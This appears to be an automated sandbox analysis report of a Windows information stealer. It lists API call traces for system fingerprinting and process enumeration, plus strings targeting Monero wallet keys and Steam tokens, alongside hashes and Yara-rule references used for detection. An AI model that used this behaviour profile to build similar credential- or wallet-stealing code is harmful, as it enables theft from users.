Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: Process$AllocCurrentExitNumaVirtual
String ID:
API String ID: 1103761159-0
Opcode ID: e26fdd964c6a7822df8d6f76bb47b7b31dde88e8affd97dbba9911a87dfc5471
Instruction ID: f8d7c479795b8f74e5f1ace7f37cc9dab3781ffba8b7d08ae70adfe83ce0ac0e
Opcode Fuzzy Hash: e26fdd964c6a7822df8d6f76bb47b7b31dde88e8affd97dbba9911a87dfc5471
Instruction Fuzzy Hash: B1E0E674985348FFE750ABE1AC4EB4D7AB8AF05B41F104054F7097A1D0D6B536409699

Function 000B1A10 Relevance: 3.9, APIs: 2, Instructions: 857stringCOMMON

Download Yara Rule

APIs

Part of subcall function 000BA740: lstrcpy.KERNEL32(000C0E17,00000000), ref: 000BA788

Part of subcall function 000BA9B0: lstrlen.KERNEL32(?,01398A60,?,\Monero\wallet.keys,000C0E17), ref: 000BA9C5
Part of subcall function 000BA9B0: lstrcpy.KERNEL32(00000000), ref: 000BAA04
Part of subcall function 000BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000BAA12

Part of subcall function 000BA8A0: lstrcpy.KERNEL32(?,000C0E17), ref: 000BA905

Part of subcall function 000B7500: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 000B7542
Part of subcall function 000B7500: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 000B757F
Part of subcall function 000B7500: GetProcessHeap.KERNEL32(00000000,00000104), ref: 000B7603
Part of subcall function 000B7500: RtlAllocateHeap.NTDLL(00000000), ref: 000B760A

Part of subcall function 000BA920: lstrcpy.KERNEL32(00000000,?), ref: 000BA972
Part of subcall function 000BA920: lstrcat.KERNEL32(00000000), ref: 000BA982

Part of subcall function 000B7690: GetProcessHeap.KERNEL32(00000000,00000104), ref: 000B76A4
Part of subcall function 000B7690: RtlAllocateHeap.NTDLL(00000000), ref: 000B76AB

Part of subcall function 000B77C0: GetCurrentProcess.KERNEL32(00000000,?,?,?,?,?,00000000,000BDBC0,000000FF,?,000B1C99,00000000,?,0139E558,00000000,?), ref: 000B77F2
Part of subcall function 000B77C0: IsWow64Process.KERNEL32(00000000,?,?,?,?,?,00000000,000BDBC0,000000FF,?,000B1C99,00000000,?,0139E558,00000000,?), ref: 000B77F9

Part of subcall function 000B7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,000A11B7), ref: 000B7880
Part of subcall function 000B7850: RtlAllocateHeap.NTDLL(00000000), ref: 000B7887
Part of subcall function 000B7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 000B789F

Part of subcall function 000B78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 000B7910
Part of subcall function 000B78E0: RtlAllocateHeap.NTDLL(00000000), ref: 000B7917
Part of subcall function 000B78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 000B792F

Part of subcall function 000B7980: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,000C0E00,00000000,?), ref: 000B79B0
Part of subcall function 000B7980: RtlAllocateHeap.NTDLL(00000000), ref: 000B79B7
Part of subcall function 000B7980: GetLocalTime.KERNEL32(?,?,?,?,?,000C0E00,00000000,?), ref: 000B79C4
Part of subcall function 000B7980: wsprintfA.USER32 ref: 000B79F3

Part of subcall function 000B7A30: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0139EA90,00000000,?,000C0E10,00000000,?,00000000,00000000), ref: 000B7A63
Part of subcall function 000B7A30: RtlAllocateHeap.NTDLL(00000000), ref: 000B7A6A
Part of subcall function 000B7A30: GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0139EA90,00000000,?,000C0E10,00000000,?,00000000,00000000,?), ref: 000B7A7D

Part of subcall function 000B7B00: GetUserDefaultLocaleName.KERNEL32(00000055,00000055,?,?,?,00000000,00000000,?,0139EA90,00000000,?,000C0E10,00000000,?,00000000,00000000), ref: 000B7B35

Part of subcall function 000B7B90: GetKeyboardLayoutList.USER32(00000000,00000000,000C05AF), ref: 000B7BE1
Part of subcall function 000B7B90: LocalAlloc.KERNEL32(00000040,?), ref: 000B7BF9
Part of subcall function 000B7B90: GetKeyboardLayoutList.USER32(?,00000000), ref: 000B7C0D
Part of subcall function 000B7B90: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 000B7C62
Part of subcall function 000B7B90: LocalFree.KERNEL32(00000000), ref: 000B7D22

Part of subcall function 000B7D80: GetSystemPowerStatus.KERNEL32(?), ref: 000B7DAD

GetCurrentProcessId.KERNEL32(00000000,?,0139E458,00000000,?,000C0E24,00000000,?,00000000,00000000,?,0139EB80,00000000,?,000C0E20,00000000), ref: 000B207E

Part of subcall function 000B9470: OpenProcess.KERNEL32(00000410,00000000,?), ref: 000B9484
Part of subcall function 000B9470: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 000B94A5
Part of subcall function 000B9470: CloseHandle.KERNEL32(00000000), ref: 000B94AF

Part of subcall function 000B7E00: GetProcessHeap.KERNEL32(00000000,00000104), ref: 000B7E37
Part of subcall function 000B7E00: RtlAllocateHeap.NTDLL(00000000), ref: 000B7E3E
Part of subcall function 000B7E00: RegOpenKeyExA.KERNEL32(80000002,0138BC78,00000000,00020119,?), ref: 000B7E5E
Part of subcall function 000B7E00: RegQueryValueExA.KERNEL32(?,0139E4F8,00000000,00000000,000000FF,000000FF), ref: 000B7E7F
Part of subcall function 000B7E00: RegCloseKey.ADVAPI32(?), ref: 000B7E92

Part of subcall function 000B7F60: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 000B7FC9
Part of subcall function 000B7F60: GetLastError.KERNEL32 ref: 000B7FD8

Part of subcall function 000B7ED0: GetSystemInfo.KERNEL32(000C0E2C), ref: 000B7F00
Part of subcall function 000B7ED0: wsprintfA.USER32 ref: 000B7F16

Part of subcall function 000B8100: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0139E9D0,00000000,?,000C0E2C,00000000,?,00000000), ref: 000B8130
Part of subcall function 000B8100: RtlAllocateHeap.NTDLL(00000000), ref: 000B8137
Part of subcall function 000B8100: GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 000B8158
Part of subcall function 000B8100: __aulldiv.LIBCMT ref: 000B8172
Part of subcall function 000B8100: __aulldiv.LIBCMT ref: 000B8180
Part of subcall function 000B8100: wsprintfA.USER32 ref: 000B81AC

Part of subcall function 000B87C0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,000C0E28,00000000,?), ref: 000B882F
Part of subcall function 000B87C0: RtlAllocateHeap.NTDLL(00000000), ref: 000B8836
Part of subcall function 000B87C0: wsprintfA.USER32 ref: 000B8850

Part of subcall function 000B8320: RegOpenKeyExA.KERNEL32(00000000,0139AEC0,00000000,00020019,00000000,000C05B6), ref: 000B83A4

Part of subcall function 000B8320: RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 000B8426
Part of subcall function 000B8320: wsprintfA.USER32 ref: 000B8459
Part of subcall function 000B8320: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 000B847B
Part of subcall function 000B8320: RegCloseKey.ADVAPI32(00000000), ref: 000B848C
Part of subcall function 000B8320: RegCloseKey.ADVAPI32(00000000), ref: 000B8499

Part of subcall function 000B8680: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,000C05B7), ref: 000B86CA
Part of subcall function 000B8680: Process32First.KERNEL32(?,00000128), ref: 000B86DE
Part of subcall function 000B8680: Process32Next.KERNEL32(?,00000128), ref: 000B86F3
Part of subcall function 000B8680: CloseHandle.KERNEL32(?), ref: 000B8761

lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 000B265B

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: Heap$Process$Allocate$Closewsprintf$NameOpenlstrcpy$InformationLocal$CurrentHandleInfoKeyboardLayoutListLocaleProcess32StatusSystemTimeUser__aulldivlstrcatlstrlen$AllocComputerCreateDefaultDirectoryEnumErrorFileFirstFreeGlobalLastLogicalMemoryModuleNextPowerProcessorQuerySnapshotToolhelp32ValueVolumeWindowsWow64Zone
String ID:
API String ID: 3113730047-0
Opcode ID: 1668801978282f3b48af1e4d638c6fdd6a3057ed6dbbc7b1791e11f71a492714
Instruction ID: ce13f14f54ba389905452291f76549c2f7559fed774c66ca17cea9f01715f9a3
Opcode Fuzzy Hash: 1668801978282f3b48af1e4d638c6fdd6a3057ed6dbbc7b1791e11f71a492714
Instruction Fuzzy Hash: 90724F72D50118BADB19FB90ECA6EEE733CAF55300F5042A9B11666453EF303B49CB66

Function 000A6D40 Relevance: 3.2, APIs: 2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71b9dc028530f3af892a4713277192acccfa5a72520311698115c244650a6f1c
Instruction ID: 72c643ad9133d1103906919353c0498074b1c69a474f35d95b0e0a4356f3a07d
Opcode Fuzzy Hash: 71b9dc028530f3af892a4713277192acccfa5a72520311698115c244650a6f1c
Instruction Fuzzy Hash: 896119B4D00218DFCB54CF94E984BEEB7B4BB05304F1885A8E41A6B281D776AF94DF91

Function 000B5100 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 40stringCOMMON

Download Yara Rule

APIs

Part of subcall function 000BA740: lstrcpy.KERNEL32(000C0E17,00000000), ref: 000BA788

Part of subcall function 000BA820: lstrlen.KERNEL32(000A4F05,?,?,000A4F05,000C0DDE), ref: 000BA82B
Part of subcall function 000BA820: lstrcpy.KERNEL32(000C0DDE,00000000), ref: 000BA885

lstrlen.KERNEL32(00000000,00000000,000C0ACA), ref: 000B512A

Strings

steam_tokens.txt, xrefs: 000B513F

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen
String ID: steam_tokens.txt
API String ID: 2001356338-401951677
Opcode ID: 5b9b9c36d1267d45c55d0760aa21bcefb5499f1d528b6b2b9a3f79bf919b37dc
Instruction ID: 9f50f8ac7396a09eaa7afde7f01e802d318a586b0555d094856c90e0496ff4f9
Opcode Fuzzy Hash: 5b9b9c36d1267d45c55d0760aa21bcefb5499f1d528b6b2b9a3f79bf919b37dc
Instruction Fuzzy Hash: 1BF01971E50108B6DB18FBB0EC67EED733CAB56300F404268B85666493EF346A09C6A3

Function 000B7ED0 Relevance: 3.0, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(000C0E2C), ref: 000B7F00
wsprintfA.USER32 ref: 000B7F16

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: InfoSystemwsprintf
String ID:
API String ID: 2452939696-0
Opcode ID: 2af517fb46e0c84d9e8041ec32231fc8bd9269e84e1915d30f8f6ccbbb14eb0e
Instruction ID: 6410a595f45443f75f292b353a72c70fd890500330a8321b758aaab3c88f67ba
Opcode Fuzzy Hash: 2af517fb46e0c84d9e8041ec32231fc8bd9269e84e1915d30f8f6ccbbb14eb0e
Instruction Fuzzy Hash: F1F06DB1A44248EBCB14CF85EC45FAAF7BCFB48B24F00066AF61592280D77569048BE5

Function 000AB4F0 Relevance: 2.9, APIs: 2, Instructions: 397stringCOMMON

Download Yara Rule

APIs

Part of subcall function 000BA740: lstrcpy.KERNEL32(000C0E17,00000000), ref: 000BA788

Part of subcall function 000BA9B0: lstrlen.KERNEL32(?,01398A60,?,\Monero\wallet.keys,000C0E17), ref: 000BA9C5
Part of subcall function 000BA9B0: lstrcpy.KERNEL32(00000000), ref: 000BAA04
Part of subcall function 000BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000BAA12

Part of subcall function 000BA920: lstrcpy.KERNEL32(00000000,?), ref: 000BA972
Part of subcall function 000BA920: lstrcat.KERNEL32(00000000), ref: 000BA982

Part of subcall function 000BA8A0: lstrcpy.KERNEL32(?,000C0E17), ref: 000BA905

Part of subcall function 000BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 000BA7E6

lstrlen.KERNEL32(00000000), ref: 000AB9C2
lstrlen.KERNEL32(00000000), ref: 000AB9D6

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: 0c3dace912893b5eaea6d4586df3ee7a791bc27e8ada56a55889feb4d06c5d50
Instruction ID: e1fdba1e37d135a9c18680ca9a892e81688518aa1950f03e0243751360aa41bb
Opcode Fuzzy Hash: 0c3dace912893b5eaea6d4586df3ee7a791bc27e8ada56a55889feb4d06c5d50
Instruction Fuzzy Hash: A9E1CE72A10118ABDF15FBA0DDA6EEE7338BF55300F404169F50676493EF346A49CBA2

Function 000AAEF0 Relevance: 2.7, APIs: 2, Instructions: 236stringCOMMON

Download Yara Rule

APIs

Part of subcall function 000BA740: lstrcpy.KERNEL32(000C0E17,00000000), ref: 000BA788

Part of subcall function 000BA9B0: lstrlen.KERNEL32(?,01398A60,?,\Monero\wallet.keys,000C0E17), ref: 000BA9C5
Part of subcall function 000BA9B0: lstrcpy.KERNEL32(00000000), ref: 000BAA04
Part of subcall function 000BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000BAA12

Part of subcall function 000BA920: lstrcpy.KERNEL32(00000000,?), ref: 000BA972
Part of subcall function 000BA920: lstrcat.KERNEL32(00000000), ref: 000BA982

Part of subcall function 000BA8A0: lstrcpy.KERNEL32(?,000C0E17), ref: 000BA905

lstrlen.KERNEL32(00000000), ref: 000AB16A
lstrlen.KERNEL32(00000000), ref: 000AB17E

Part of subcall function 000BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 000BA7E6

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
